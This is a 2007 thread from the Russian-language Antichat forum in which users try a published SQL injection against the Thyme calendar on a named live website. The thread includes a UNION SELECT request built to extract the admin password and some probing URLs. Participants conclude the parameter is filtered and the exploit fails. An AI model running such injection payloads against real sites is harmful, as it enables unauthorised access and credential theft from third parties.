Форум АНТИЧАТ - Странная бага

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Странная бага (https://forum.antichat.xyz/showthread.php?t=44578)

Azter

16.07.2007 19:52

Странная бага

В общем вот такой сайт
hxxp://www.ypsielbow.com/thyme/
нашел багу под календарь
hxxp://www.milw0rm.com/exploits/3895, но толи я не правильно понял толи что-т с багой не так, но когда делаю запрос

Код:

http://www.ypsielbow.com/thyme/event_view.php?eid=34%20UNION%20SELECT%20pass%20FROM%20thyme_Users%20WHERE%20username%20=%20%22admin%22

Но в коде страницы ничего нету =(

delay(0)

16.07.2007 20:23

Цитата:

The vulnerability exists in event_view.php, because the 'eid' field is not
properly
validated. An attacker could exploit the vulnerabilit with the following
request:

Походил ещё по паре календарей, везде параметры фильтруются. Милворм врёт?

Isis	16.07.2007 20:35

Нету там скули..

Код:

http://www.ypsielbow.com/thyme/event_view.php?eid=35-1

Код:

http://www.ypsielbow.com/thyme/event_view.php?eid=34

Azter

16.07.2007 20:58

Isis
и такое чувство что ее нигде нет...просто я тоже подумал что может пропатчено, но посмотрел еще 3-4 сайта тот-же результат.

Время: 18:03